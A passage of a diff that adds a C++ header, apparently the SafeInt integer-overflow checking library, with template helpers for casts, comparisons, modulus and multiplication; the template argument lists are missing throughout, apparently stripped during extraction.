static_cast(static_cast(0)) == 0 + }; +}; +#endif // type traits + +// Use this to avoid compile-time const truncation warnings +template +class SafeIntMinMax; + +template<> +class SafeIntMinMax +{ +public: + const static signed __int8 min = (-0x7f - 1); + const static signed __int8 max = 0x7f; +}; +template<> +class SafeIntMinMax +{ +public: + const static __int16 min = (-0x7fff - 1); + const static __int16 max = 0x7fff; +}; +template<> +class SafeIntMinMax +{ +public: + const static __int32 min = (-0x7fffffff - 1); + const static __int32 max = 0x7fffffff; +}; +template<> +class SafeIntMinMax +{ +public: + const static __int64 min = static_cast<__int64>(0x8000000000000000LL); + const static __int64 max = 0x7fffffffffffffffLL; +}; + +template<> +class SafeIntMinMax +{ +public: + const static unsigned __int8 min = 0; + const static unsigned __int8 max = 0xff; +}; +template<> +class SafeIntMinMax +{ +public: + const static unsigned __int16 min = 0; + const static unsigned __int16 max = 0xffff; +}; +template<> +class SafeIntMinMax +{ +public: + const static unsigned __int32 min = 0; + const static unsigned __int32 max = 0xffffffff; +}; +template<> +class SafeIntMinMax +{ +public: + const static unsigned __int64 min = 0; + const static unsigned __int64 max = 0xffffffffffffffffULL; +}; + +template +class IntTraits +{ +public: + C_ASSERT(NumericType::isInt); + enum + { + isSigned = ((T)(-1) < 0), + is64Bit = (sizeof(T) == 8), + is32Bit = (sizeof(T) == 4), + is16Bit = (sizeof(T) == 2), + is8Bit = (sizeof(T) == 1), + isLT32Bit = (sizeof(T) < 4), + isLT64Bit = (sizeof(T) < 8), + isInt8 = (sizeof(T) == 1 && isSigned), + isUint8 = (sizeof(T) == 1 && !isSigned), + isInt16 = (sizeof(T) == 2 && isSigned), + isUint16 = (sizeof(T) == 2 && !isSigned), + isInt32 = (sizeof(T) == 4 && isSigned), + isUint32 = (sizeof(T) == 4 && !isSigned), + isInt64 = (sizeof(T) == 8 && isSigned), + isUint64 = (sizeof(T) == 8 && !isSigned), + bitCount = (sizeof(T) * 8), + isBool = ((T)2 == (T)1) + }; + + // On version 13.10 enums cannot define __int64 values + // so we'll use const statics instead! + // These must be cast to deal with the possibility of a SafeInt being given an enum as an argument + const static T maxInt = static_cast(SafeIntMinMax::max); + const static T minInt = static_cast(SafeIntMinMax::min); +}; + +template +const T IntTraits::maxInt; +template +const T IntTraits::minInt; + +template +class SafeIntCompare +{ +public: + enum + { + isBothSigned = (IntTraits::isSigned && IntTraits::isSigned), + isBothUnsigned = (!IntTraits::isSigned && !IntTraits::isSigned), + isLikeSigned = ((bool)(IntTraits::isSigned) == (bool)(IntTraits::isSigned)), + isCastOK = ((isLikeSigned && sizeof(T) >= sizeof(U)) || (IntTraits::isSigned && sizeof(T) > sizeof(U))), + isBothLT32Bit = (IntTraits::isLT32Bit && IntTraits::isLT32Bit), + isBothLT64Bit = (IntTraits::isLT64Bit && IntTraits::isLT64Bit) + }; +}; + +// all of the arithmetic operators can be solved by the same code within +// each of these regions without resorting to compile-time constant conditionals +// most operators collapse the problem into less than the 22 zones, but this is used +// as the first cut +// using this also helps ensure that we handle all of the possible cases correctly + +template +class IntRegion +{ +public: + enum + { + // unsigned-unsigned zone + IntZone_UintLT32_UintLT32 = SafeIntCompare::isBothUnsigned && SafeIntCompare::isBothLT32Bit, + IntZone_Uint32_UintLT64 = + SafeIntCompare::isBothUnsigned && IntTraits::is32Bit && IntTraits::isLT64Bit, + IntZone_UintLT32_Uint32 = + SafeIntCompare::isBothUnsigned && IntTraits::isLT32Bit && IntTraits::is32Bit, + IntZone_Uint64_Uint = SafeIntCompare::isBothUnsigned && IntTraits::is64Bit, + IntZone_UintLT64_Uint64 = + SafeIntCompare::isBothUnsigned && IntTraits::isLT64Bit && IntTraits::is64Bit, + // unsigned-signed + IntZone_UintLT32_IntLT32 = + !IntTraits::isSigned && IntTraits::isSigned && SafeIntCompare::isBothLT32Bit, + IntZone_Uint32_IntLT64 = IntTraits::isUint32 && IntTraits::isSigned && IntTraits::isLT64Bit, + IntZone_UintLT32_Int32 = !IntTraits::isSigned && IntTraits::isLT32Bit && IntTraits::isInt32, + IntZone_Uint64_Int = IntTraits::isUint64 && IntTraits::isSigned && IntTraits::isLT64Bit, + IntZone_UintLT64_Int64 = !IntTraits::isSigned && IntTraits::isLT64Bit && IntTraits::isInt64, + IntZone_Uint64_Int64 = IntTraits::isUint64 && IntTraits::isInt64, + // signed-signed + IntZone_IntLT32_IntLT32 = SafeIntCompare::isBothSigned && SafeIntCompare::isBothLT32Bit, + IntZone_Int32_IntLT64 = SafeIntCompare::isBothSigned && IntTraits::is32Bit && IntTraits::isLT64Bit, + IntZone_IntLT32_Int32 = SafeIntCompare::isBothSigned && IntTraits::isLT32Bit && IntTraits::is32Bit, + IntZone_Int64_Int64 = SafeIntCompare::isBothSigned && IntTraits::isInt64 && IntTraits::isInt64, + IntZone_Int64_Int = SafeIntCompare::isBothSigned && IntTraits::is64Bit && IntTraits::isLT64Bit, + IntZone_IntLT64_Int64 = SafeIntCompare::isBothSigned && IntTraits::isLT64Bit && IntTraits::is64Bit, + // signed-unsigned + IntZone_IntLT32_UintLT32 = + IntTraits::isSigned && !IntTraits::isSigned && SafeIntCompare::isBothLT32Bit, + IntZone_Int32_UintLT32 = IntTraits::isInt32 && !IntTraits::isSigned && IntTraits::isLT32Bit, + IntZone_IntLT64_Uint32 = IntTraits::isSigned && IntTraits::isLT64Bit && IntTraits::isUint32, + IntZone_Int64_UintLT64 = IntTraits::isInt64 && !IntTraits::isSigned && IntTraits::isLT64Bit, + IntZone_Int_Uint64 = IntTraits::isSigned && IntTraits::isUint64 && IntTraits::isLT64Bit, + IntZone_Int64_Uint64 = IntTraits::isInt64 && IntTraits::isUint64 + }; +}; + +// In all of the following functions, we have two versions +// One for SafeInt, which throws C++ (or possibly SEH) exceptions +// The non-throwing versions are for use by the helper functions that return success and failure. +// Some of the non-throwing functions are not used, but are maintained for completeness. + +// There's no real alternative to duplicating logic, but keeping the two versions +// immediately next to one another will help reduce problems + +// useful function to help with getting the magnitude of a negative number +enum AbsMethod +{ + AbsMethodInt, + AbsMethodInt64, + AbsMethodNoop +}; + +template +class GetAbsMethod +{ +public: + enum + { + method = IntTraits::isLT64Bit && IntTraits::isSigned + ? AbsMethodInt + : IntTraits::isInt64 ? AbsMethodInt64 : AbsMethodNoop + }; +}; + +// let's go ahead and hard-code a dependency on the +// representation of negative numbers to keep compilers from getting overly +// happy with optimizing away things like -MIN_INT. +template +class AbsValueHelper; + +template +class AbsValueHelper +{ +public: + static unsigned __int32 Abs(T t) SAFEINT_NOTHROW + { + SAFEINT_ASSERT(t < 0); + return ~(unsigned __int32)t + 1; + } +}; + +template +class AbsValueHelper +{ +public: + static unsigned __int64 Abs(T t) SAFEINT_NOTHROW + { + SAFEINT_ASSERT(t < 0); + return ~(unsigned __int64)t + 1; + } +}; + +template +class AbsValueHelper +{ +public: + static T Abs(T t) SAFEINT_NOTHROW + { + // Why are you calling Abs on an unsigned number ??? + SAFEINT_ASSERT(false); + return t; + } +}; + +template +class NegationHelper; +// Previous versions had an assert that the type being negated was 32-bit or higher +// In retrospect, this seems like something to just document +// Negation will normally upcast to int +// For example -(unsigned short)0xffff == (int)0xffff0001 +// This class will retain the type, and will truncate, which may not be what +// you wanted +// If you want normal operator casting behavior, do this: +// SafeInt ss = 0xffff; +// then: +// -(SafeInt(ss)) +// will then emit a signed int with the correct value and bitfield + +template +class NegationHelper // Signed +{ +public: + template + static T NegativeThrow(T t) SAFEINT_CPP_THROW + { + // corner case + if (t != IntTraits::minInt) + { + // cast prevents unneeded checks in the case of small ints + return -t; + } + E::SafeIntOnOverflow(); + } + + static bool Negative(T t, T& ret) SAFEINT_NOTHROW + { + // corner case + if (t != IntTraits::minInt) + { + // cast prevents unneeded checks in the case of small ints + ret = -t; + return true; + } + return false; + } +}; + +// Helper classes to work keep compilers from +// optimizing away negation +template +class SignedNegation; + +template<> +class SignedNegation +{ +public: + static signed __int32 Value(unsigned __int64 in) SAFEINT_NOTHROW + { + return (signed __int32)(~(unsigned __int32)in + 1); + } + + static signed __int32 Value(unsigned __int32 in) SAFEINT_NOTHROW { return (signed __int32)(~in + 1); } +}; + +template<> +class SignedNegation +{ +public: + static signed __int64 Value(unsigned __int64 in) SAFEINT_NOTHROW { return (signed __int64)(~in + 1); } +}; + +template +class NegationHelper // unsigned +{ +public: + template + static T NegativeThrow(T t) SAFEINT_CPP_THROW + { +#if defined SAFEINT_DISALLOW_UNSIGNED_NEGATION + C_ASSERT(sizeof(T) == 0); +#endif + +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER +#pragma warning(push) +// this avoids warnings from the unary '-' operator being applied to unsigned numbers +#pragma warning(disable : 4146) +#endif + // Note - this could be quenched on gcc + // by doing something like: + // return (T)-((__int64)t); + // but it seems like you would want a warning when doing this. + return (T)-t; + +#if SAFEINT_COMPILER == VISUAL_STUDIO_COMPILER +#pragma warning(pop) +#endif + } + + static bool Negative(T t, T& ret) SAFEINT_NOTHROW + { + if (IntTraits::isLT32Bit) + { + // See above + SAFEINT_ASSERT(false); + } +#if defined SAFEINT_DISALLOW_UNSIGNED_NEGATION + C_ASSERT(sizeof(T) == 0); +#endif + // Do it this way to avoid warning + ret = -t; + return true; + } +}; + +// core logic to determine casting behavior +enum CastMethod +{ + CastOK = 0, + CastCheckLTZero, + CastCheckGTMax, + CastCheckSafeIntMinMaxUnsigned, + CastCheckSafeIntMinMaxSigned, + CastToFloat, + CastFromFloat, + CastToBool, + CastFromBool +}; + +template +class GetCastMethod +{ +public: + enum + { + method = (IntTraits::isBool && !IntTraits::isBool) + ? CastFromBool + : + + (!IntTraits::isBool && IntTraits::isBool) + ? CastToBool + : + + (SafeIntCompare::isCastOK) + ? CastOK + : + + ((IntTraits::isSigned && !IntTraits::isSigned && + sizeof(FromType) >= sizeof(ToType)) || + (SafeIntCompare::isBothUnsigned && sizeof(FromType) > sizeof(ToType))) + ? CastCheckGTMax + : + + (!IntTraits::isSigned && IntTraits::isSigned && + sizeof(ToType) >= sizeof(FromType)) + ? CastCheckLTZero + : + + (!IntTraits::isSigned) ? CastCheckSafeIntMinMaxUnsigned + : CastCheckSafeIntMinMaxSigned + }; +}; + +template +class GetCastMethod +{ +public: + enum + { + method = CastOK + }; +}; + +template +class GetCastMethod +{ +public: + enum + { + method = CastOK + }; +}; + +template +class GetCastMethod +{ +public: + enum + { + method = CastOK + }; +}; + +template +class GetCastMethod +{ +public: + enum + { + method = CastFromFloat + }; +}; + +template +class GetCastMethod +{ +public: + enum + { + method = CastFromFloat + }; +}; + +template +class GetCastMethod +{ +public: + enum + { + method = CastFromFloat + }; +}; + +template +class SafeCastHelper; + +template +class SafeCastHelper +{ +public: + static bool Cast(U u, T& t) SAFEINT_NOTHROW + { + t = (T)u; + return true; + } + + template + static void CastThrow(U u, T& t) SAFEINT_CPP_THROW + { + t = (T)u; + } +}; + +// special case floats and doubles +// tolerate loss of precision +template +class SafeCastHelper +{ +public: + static bool Cast(U u, T& t) SAFEINT_NOTHROW + { + if (u <= (U)IntTraits::maxInt && u >= (U)IntTraits::minInt) + { + t = (T)u; + return true; + } + return false; + } + + template + static void CastThrow(U u, T& t) SAFEINT_CPP_THROW + { + if (u <= (U)IntTraits::maxInt && u >= (U)IntTraits::minInt) + { + t = (T)u; + return; + } + E::SafeIntOnOverflow(); + } +}; + +// Match on any method where a bool is cast to type T +template +class SafeCastHelper +{ +public: + static bool Cast(bool b, T& t) SAFEINT_NOTHROW + { + t = (T)(b ? 1 : 0); + return true; + } + + template + static void CastThrow(bool b, T& t) SAFEINT_CPP_THROW + { + t = (T)(b ? 1 : 0); + } +}; + +template +class SafeCastHelper +{ +public: + static bool Cast(T t, bool& b) SAFEINT_NOTHROW + { + b = !!t; + return true; + } + + template + static void CastThrow(bool b, T& t) SAFEINT_CPP_THROW + { + b = !!t; + } +}; + +template +class SafeCastHelper +{ +public: + static bool Cast(U u, T& t) SAFEINT_NOTHROW + { + if (u < 0) return false; + + t = (T)u; + return true; + } + + template + static void CastThrow(U u, T& t) SAFEINT_CPP_THROW + { + if (u < 0) E::SafeIntOnOverflow(); + + t = (T)u; + } +}; + +template +class SafeCastHelper +{ +public: + static bool Cast(U u, T& t) SAFEINT_NOTHROW + { + if (u > (U)IntTraits::maxInt) return false; + + t = (T)u; + return true; + } + + template + static void CastThrow(U u, T& t) SAFEINT_CPP_THROW + { + if (u > (U)IntTraits::maxInt) E::SafeIntOnOverflow(); + + t = (T)u; + } +}; + +template +class SafeCastHelper +{ +public: + static bool Cast(U u, T& t) SAFEINT_NOTHROW + { + // U is signed - T could be either signed or unsigned + if (u > IntTraits::maxInt || u < 0) return false; + + t = (T)u; + return true; + } + + template + static void CastThrow(U u, T& t) SAFEINT_CPP_THROW + { + // U is signed - T could be either signed or unsigned + if (u > IntTraits::maxInt || u < 0) E::SafeIntOnOverflow(); + + t = (T)u; + } +}; + +template +class SafeCastHelper +{ +public: + static bool Cast(U u, T& t) SAFEINT_NOTHROW + { + // T, U are signed + if (u > IntTraits::maxInt || u < IntTraits::minInt) return false; + + t = (T)u; + return true; + } + + template + static void CastThrow(U u, T& t) SAFEINT_CPP_THROW + { + // T, U are signed + if (u > IntTraits::maxInt || u < IntTraits::minInt) E::SafeIntOnOverflow(); + + t = (T)u; + } +}; + +// core logic to determine whether a comparison is valid, or needs special treatment +enum ComparisonMethod +{ + ComparisonMethod_Ok = 0, + ComparisonMethod_CastInt, + ComparisonMethod_CastInt64, + ComparisonMethod_UnsignedT, + ComparisonMethod_UnsignedU +}; + +// Note - the standard is arguably broken in the case of some integer +// conversion operations +// For example, signed char a = -1 = 0xff +// unsigned int b = 0xffffffff +// If you then test if a < b, a value-preserving cast +// is made, and you're essentially testing +// (unsigned int)a < b == false +// +// I do not think this makes sense - if you perform +// a cast to an __int64, which can clearly preserve both value and signedness +// then you get a different and intuitively correct answer +// IMHO, -1 should be less than 4 billion +// If you prefer to retain the ANSI standard behavior +// insert #define ANSI_CONVERSIONS into your source +// Behavior differences occur in the following cases: +// 8, 16, and 32-bit signed int, unsigned 32-bit int +// any signed int, unsigned 64-bit int +// Note - the signed int must be negative to show the problem + +template +class ValidComparison +{ +public: + enum + { +#ifdef ANSI_CONVERSIONS + method = ComparisonMethod_Ok +#else + method = ((SafeIntCompare::isLikeSigned) + ? ComparisonMethod_Ok + : ((IntTraits::isSigned && sizeof(T) < 8 && sizeof(U) < 4) || + (IntTraits::isSigned && sizeof(T) < 4 && sizeof(U) < 8)) + ? ComparisonMethod_CastInt + : ((IntTraits::isSigned && sizeof(U) < 8) || (IntTraits::isSigned && sizeof(T) < 8)) + ? ComparisonMethod_CastInt64 + : (!IntTraits::isSigned) ? ComparisonMethod_UnsignedT : ComparisonMethod_UnsignedU) +#endif + }; +}; + +template +class EqualityTest; + +template +class EqualityTest +{ +public: + static bool IsEquals(const T t, const U u) SAFEINT_NOTHROW { return (t == u); } +}; + +template +class EqualityTest +{ +public: + static bool IsEquals(const T t, const U u) SAFEINT_NOTHROW { return ((int)t == (int)u); } +}; + +template +class EqualityTest +{ +public: + static bool IsEquals(const T t, const U u) SAFEINT_NOTHROW { return ((__int64)t == (__int64)u); } +}; + +template +class EqualityTest +{ +public: + static bool IsEquals(const T t, const U u) SAFEINT_NOTHROW + { + // one operand is 32 or 64-bit unsigned, and the other is signed and the same size or smaller + if (u < 0) return false; + + // else safe to cast to type T + return (t == (T)u); + } +}; + +template +class EqualityTest +{ +public: + static bool IsEquals(const T t, const U u) SAFEINT_NOTHROW + { + // one operand is 32 or 64-bit unsigned, and the other is signed and the same size or smaller + if (t < 0) return false; + + // else safe to cast to type U + return ((U)t == u); + } +}; + +template +class GreaterThanTest; + +template +class GreaterThanTest +{ +public: + static bool GreaterThan(const T t, const U u) SAFEINT_NOTHROW { return (t > u); } +}; + +template +class GreaterThanTest +{ +public: + static bool GreaterThan(const T t, const U u) SAFEINT_NOTHROW { return ((int)t > (int)u); } +}; + +template +class GreaterThanTest +{ +public: + static bool GreaterThan(const T t, const U u) SAFEINT_NOTHROW { return ((__int64)t > (__int64)u); } +}; + +template +class GreaterThanTest +{ +public: + static bool GreaterThan(const T t, const U u) SAFEINT_NOTHROW + { + // one operand is 32 or 64-bit unsigned, and the other is signed and the same size or smaller + if (u < 0) return true; + + // else safe to cast to type T + return (t > (T)u); + } +}; + +template +class GreaterThanTest +{ +public: + static bool GreaterThan(const T t, const U u) SAFEINT_NOTHROW + { + // one operand is 32 or 64-bit unsigned, and the other is signed and the same size or smaller + if (t < 0) return false; + + // else safe to cast to type U + return ((U)t > u); + } +}; + +// Modulus is simpler than comparison, but follows much the same logic +// using this set of functions, it can't fail except in a div 0 situation +template +class ModulusHelper; + +template +class ModulusHelper +{ +public: + static SafeIntError Modulus(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + // trap corner case + if (CompileConst::isSigned>::Value()) + { + // Some compilers don't notice that this only compiles when u is signed + // Add cast to make them happy + if (u == (U)-1) + { + result = 0; + return SafeIntNoError; + } + } + + result = (T)(t % u); + return SafeIntNoError; + } + + template + static void ModulusThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) E::SafeIntOnDivZero(); + + // trap corner case + if (CompileConst::isSigned>::Value()) + { + if (u == (U)-1) + { + result = 0; + return; + } + } + + result = (T)(t % u); + } +}; + +template +class ModulusHelper +{ +public: + static SafeIntError Modulus(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + // trap corner case + if (CompileConst::isSigned>::Value()) + { + if (u == (U)-1) + { + result = 0; + return SafeIntNoError; + } + } + + result = (T)(t % u); + return SafeIntNoError; + } + + template + static void ModulusThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) E::SafeIntOnDivZero(); + + // trap corner case + if (CompileConst::isSigned>::Value()) + { + if (u == (U)-1) + { + result = 0; + return; + } + } + + result = (T)(t % u); + } +}; + +template +class ModulusHelper +{ +public: + static SafeIntError Modulus(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + // trap corner case + if (CompileConst::isSigned>::Value()) + { + if (u == (U)-1) + { + result = 0; + return SafeIntNoError; + } + } + + result = (T)((__int64)t % (__int64)u); + return SafeIntNoError; + } + + template + static void ModulusThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) E::SafeIntOnDivZero(); + + if (CompileConst::isSigned>::Value()) + { + if (u == (U)-1) + { + result = 0; + return; + } + } + + result = (T)((__int64)t % (__int64)u); + } +}; + +// T is unsigned __int64, U is any signed int +template +class ModulusHelper +{ +public: + static SafeIntError Modulus(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + // u could be negative - if so, need to convert to positive + // casts below are always safe due to the way modulus works + if (u < 0) + result = (T)(t % AbsValueHelper::method>::Abs(u)); + else + result = (T)(t % u); + + return SafeIntNoError; + } + + template + static void ModulusThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) E::SafeIntOnDivZero(); + + // u could be negative - if so, need to convert to positive + if (u < 0) + result = (T)(t % AbsValueHelper::method>::Abs(u)); + else + result = (T)(t % u); + } +}; + +// U is unsigned __int64, T any signed int +template +class ModulusHelper +{ +public: + static SafeIntError Modulus(const T& t, const U& u, T& result) SAFEINT_NOTHROW + { + if (u == 0) return SafeIntDivideByZero; + + // t could be negative - if so, need to convert to positive + if (t < 0) + result = (T)(~(AbsValueHelper::method>::Abs(t) % u) + 1); + else + result = (T)((T)t % u); + + return SafeIntNoError; + } + + template + static void ModulusThrow(const T& t, const U& u, T& result) SAFEINT_CPP_THROW + { + if (u == 0) E::SafeIntOnDivZero(); + + // t could be negative - if so, need to convert to positive + if (t < 0) + result = (T)(~(AbsValueHelper::method>::Abs(t) % u) + 1); + else + result = (T)((T)t % u); + } +}; + +// core logic to determine method to check multiplication +enum MultiplicationState +{ + MultiplicationState_CastInt = 0, // One or both signed, smaller than 32-bit + MultiplicationState_CastInt64, // One or both signed, smaller than 64-bit + MultiplicationState_CastUint, // Both are unsigned, smaller than 32-bit + MultiplicationState_CastUint64, // Both are unsigned, both 32-bit or smaller + MultiplicationState_Uint64Uint, // Both are unsigned, lhs 64-bit, rhs 32-bit or smaller + MultiplicationState_Uint64Uint64, // Both are unsigned int64 + MultiplicationState_Uint64Int, // lhs is unsigned int64, rhs int32 + MultiplicationState_Uint64Int64, // lhs is unsigned int64, rhs signed int64 + MultiplicationState_UintUint64, // Both are unsigned, lhs 32-bit or smaller, rhs 64-bit + MultiplicationState_UintInt64, // lhs unsigned 32-bit or less, rhs int64 + MultiplicationState_Int64Uint, // lhs int64, rhs unsigned int32 + MultiplicationState_Int64Int64, // lhs int64, rhs int64 + MultiplicationState_Int64Int, // lhs int64, rhs int32 + MultiplicationState_IntUint64, // lhs int, rhs unsigned int64 + MultiplicationState_IntInt64, // lhs int, rhs int64 + MultiplicationState_Int64Uint64, // lhs int64, rhs uint64 + MultiplicationState_Error +}; + +template +class MultiplicationMethod +{ +public: + enum + { + // unsigned-unsigned + method = + (IntRegion::IntZone_UintLT32_UintLT32 + ? MultiplicationState_CastUint + : (IntRegion::IntZone_Uint32_UintLT64 || IntRegion::IntZone_UintLT32_Uint32) + ? MultiplicationState_CastUint64 + : SafeIntCompare::isBothUnsigned && IntTraits::isUint64 && IntTraits::isUint64 + ? MultiplicationState_Uint64Uint64 + : (IntRegion::IntZone_Uint64_Uint) + ? MultiplicationState_Uint64Uint + : (IntRegion::IntZone_UintLT64_Uint64) ? MultiplicationState_UintUint64 : + // unsigned-signed + (IntRegion::IntZone_UintLT32_IntLT32) + ? MultiplicationState_CastInt + : (IntRegion::IntZone_Uint32_IntLT64 || + IntRegion::IntZone_UintLT32_Int32) + ? MultiplicationState_CastInt64 + : (IntRegion::IntZone_Uint64_Int) + ? MultiplicationState_Uint64Int + : (IntRegion::IntZone_UintLT64_Int64) + ? MultiplicationState_UintInt64 + : (IntRegion::IntZone_Uint64_Int64) + ? MultiplicationState_Uint64Int64 + : + // signed-signed + (IntRegion::IntZone_IntLT32_IntLT32) + ? MultiplicationState_CastInt + : (IntRegion::IntZone_Int32_IntLT64 || + IntRegion::IntZone_IntLT32_Int32) + ? MultiplicationState_CastInt64 + : (IntRegion::IntZone_Int64_Int64) + ? MultiplicationState_Int64Int64 + : (IntRegion::IntZone_Int64_Int) + ? MultiplicationState_Int64Int + : (IntRegion:: + IntZone_IntLT64_Int64) + ? MultiplicationState_IntInt64 + : + // signed-unsigned + (IntRegion:: + IntZone_IntLT32_UintLT32) + ? MultiplicationState_CastInt + : (IntRegion:: + IntZone_Int32_UintLT32 || + IntRegion:: + IntZone_IntLT64_Uint32) + ? MultiplicationState_CastInt64 + : (IntRegion< + T, + U>:: + IntZone_Int64_UintLT64) + ? MultiplicationState_Int64Uint + : (IntRegion< + T, + U>:: + IntZone_Int_Uint64) + ? MultiplicationState_IntUint64 + : (IntRegion< + T, + U>::IntZone_Int64_Uint64 + ? MultiplicationState_Int64Uint64 + : MultiplicationState_Error)) + }; +}; + +template +class MultiplicationHelper; + +template +class MultiplicationHelper +{ +public: + // accepts signed, both less than 32-bit + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + int tmp = t * u; + + if (tmp > IntTraits::maxInt || tmp < IntTraits::minInt) return false; + + ret = (T)tmp; + return true; + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + int tmp = t * u; + + if (tmp > IntTraits::maxInt || tmp < IntTraits::minInt) E::SafeIntOnOverflow(); + + ret = (T)tmp; + } +}; + +template +class MultiplicationHelper +{ +public: + // accepts unsigned, both less than 32-bit + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + unsigned int tmp = (unsigned int)(t * u); + + if (tmp > IntTraits::maxInt) return false; + + ret = (T)tmp; + return true; + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + unsigned int tmp = (unsigned int)(t * u); + + if (tmp > IntTraits::maxInt) E::SafeIntOnOverflow(); + + ret = (T)tmp; + } +}; + +template +class MultiplicationHelper +{ +public: + // mixed signed or both signed where at least one argument is 32-bit, and both a 32-bit or less + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + __int64 tmp = (__int64)t * (__int64)u; + + if (tmp > (__int64)IntTraits::maxInt || tmp < (__int64)IntTraits::minInt) return false; + + ret = (T)tmp; + return true; + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + __int64 tmp = (__int64)t * (__int64)u; + + if (tmp > (__int64)IntTraits::maxInt || tmp < (__int64)IntTraits::minInt) E::SafeIntOnOverflow(); + + ret = (T)tmp; + } +}; + +template +class MultiplicationHelper +{ +public: + // both unsigned where at least one argument is 32-bit, and both are 32-bit or less + static bool Multiply(const T& t, const U& u, T& ret) SAFEINT_NOTHROW + { + unsigned __int64 tmp = (unsigned __int64)t * (unsigned __int64)u; + + if (tmp > (unsigned __int64)IntTraits::maxInt) return false; + + ret = (T)tmp; + return true; + } + + template + static void MultiplyThrow(const T& t, const U& u, T& ret) SAFEINT_CPP_THROW + { + unsigned __int64 tmp = (unsigned __int64)t * (unsigned __int64)u; + + if (tmp > (unsigned __int64)IntTraits::maxInt) E::SafeIntOnOverflow(); + + ret = (T)tmp; + } +}; + +// T = left arg and return type +// U = right arg +template +class LargeIntRegMultiply; + +#if SAFEINT_USE_INTRINSICS +// As usual, unsigned is easy +inline bool IntrinsicMultiplyUint64(const unsigned __int64& a, + const unsigned __int64& b, + unsigned __int64* pRet) SAFEINT_NOTHROW +{ + unsigned __int64 ulHigh = 0; + *pRet = _umul128(a, b, &ulHigh); + return ulHigh == 0; +} + +// Signed, is not so easy +inline bool IntrinsicMultiplyInt64(const signed __int64& a, + const signed __int64& b, + signed __int64* pRet) SAFEINT_NOTHROW +{ + __int64 llHigh = 0; + *pRet = _mul128(a, b, &llHigh); + + // Now we need to figure out what we expect + // If llHigh is 0, then treat *pRet as unsigned + // If llHigh is < 0, then treat *pRet as signed + + if ((a ^ b) < 0) + { + // Negative result expected + if (llHigh == -1 && *pRet < 0 || llHigh == 0 && *pRet == 0) + { + // Everything is within range + return true; + } + } + else + { + // Result should be positive + // Check for overflow + if (llHigh == 0 && (unsigned __int64)*pRet <= IntTraits::maxInt) return true; + } + return false; +} + +#endif + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(const unsigned __int64& a, + const unsigned __int64& b, + unsigned __int64* pRet) SAFEINT_NOTHROW + { +#if SAFEINT_USE_INTRINSICS + return IntrinsicMultiplyUint64(a, b, pRet); +#else + unsigned __int32 aHigh, aLow, bHigh, bLow; + + // Consider that a*b can be broken up into: + // (aHigh * 2^32 + aLow) * (bHigh * 2^32 + bLow) + // => (aHigh * bHigh * 2^64) + (aLow * bHigh * 2^32) + (aHigh * bLow * 2^32) + (aLow * bLow) + // Note - same approach applies for 128 bit math on a 64-bit system + + aHigh = (unsigned __int32)(a >> 32); + aLow = (unsigned __int32)a; + bHigh = (unsigned __int32)(b >> 32); + bLow = (unsigned __int32)b; + + *pRet = 0; + + if (aHigh == 0) + { + if (bHigh != 0) + { + *pRet = (unsigned __int64)aLow * (unsigned __int64)bHigh; + } + } + else if (bHigh == 0) + { + if (aHigh != 0) + { + *pRet = (unsigned __int64)aHigh * (unsigned __int64)bLow; + } + } + else + { + return false; + } + + if (*pRet != 0) + { + unsigned __int64 tmp; + + if ((unsigned __int32)(*pRet >> 32) != 0) return false; + + *pRet <<= 32; + tmp = (unsigned __int64)aLow * (unsigned __int64)bLow; + *pRet += tmp; + + if (*pRet < tmp) return false; + + return true; + } + + *pRet = (unsigned __int64)aLow * (unsigned __int64)bLow; + return true; +#endif + } + + template + static void RegMultiplyThrow(const unsigned __int64& a, + const unsigned __int64& b, + unsigned __int64* pRet) SAFEINT_CPP_THROW + { +#if SAFEINT_USE_INTRINSICS + if (!IntrinsicMultiplyUint64(a, b, pRet)) E::SafeIntOnOverflow(); +#else + unsigned __int32 aHigh, aLow, bHigh, bLow; + + // Consider that a*b can be broken up into: + // (aHigh * 2^32 + aLow) * (bHigh * 2^32 + bLow) + // => (aHigh * bHigh * 2^64) + (aLow * bHigh * 2^32) + (aHigh * bLow * 2^32) + (aLow * bLow) + // Note - same approach applies for 128 bit math on a 64-bit system + + aHigh = (unsigned __int32)(a >> 32); + aLow = (unsigned __int32)a; + bHigh = (unsigned __int32)(b >> 32); + bLow = (unsigned __int32)b; + + *pRet = 0; + + if (aHigh == 0) + { + if (bHigh != 0) + { + *pRet = (unsigned __int64)aLow * (unsigned __int64)bHigh; + } + } + else if (bHigh == 0) + { + if (aHigh != 0) + { + *pRet = (unsigned __int64)aHigh * (unsigned __int64)bLow; + } + } + else + { + E::SafeIntOnOverflow(); + } + + if (*pRet != 0) + { + unsigned __int64 tmp; + + if ((unsigned __int32)(*pRet >> 32) != 0) E::SafeIntOnOverflow(); + + *pRet <<= 32; + tmp = (unsigned __int64)aLow * (unsigned __int64)bLow; + *pRet += tmp; + + if (*pRet < tmp) E::SafeIntOnOverflow(); + + return; + } + + *pRet = (unsigned __int64)aLow * (unsigned __int64)bLow; +#endif + } +}; + +template<> +class LargeIntRegMultiply +{ +public: + static bool RegMultiply(const unsigned __int64& a, unsigned __int32 b, unsigned __int64* pRet) SAFEINT_NOTHROW + { +#if SAFEINT_USE_INTRINSICS + return IntrinsicMultiplyUint64(a, (unsigned __int64)b, pRet); +#else + unsigned __int32 aHigh, aLow; + + // Consider that a*b can be broken up into: + // (aHigh * 